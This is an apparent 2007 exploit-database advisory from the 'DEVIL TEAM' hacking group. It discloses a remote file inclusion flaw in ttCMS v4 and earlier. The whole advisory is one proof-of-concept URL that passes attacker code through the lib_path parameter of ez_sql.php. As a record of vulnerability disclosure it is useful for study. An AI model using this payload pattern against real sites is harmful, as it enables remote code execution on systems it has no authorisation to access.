id: 1646
date: 03/24/2007
title: ttCMS <= v4 (ez_sql.php lib_path) Remote File Inclusion Vulnerability
author: Kacper
cves: 

=====================================================================
ttCMS <= v4 (ez_sql.php lib_path) Remote File Inclusion Vulnerability
=====================================================================



DEVIL TEAM - HACKING POLISH TEAM

Author: Kacper (a.k.a Rahim) 
--------------------------------------------
Pozdro dla wszystkich z kanalu IRC oraz forum DEVIL TEAM.



ttCMS <= v4 (ez_sql.php lib_path) RFI Vulnerability
script download/homepage: http://www.ttcms.com/v4/


--------------------------------------------
Vulnerabilities:

http://site.com/ttCMS_path/lib/db/ez_sql.php?lib_path=[evil_code]



#  0day.today [2023-03-24]  #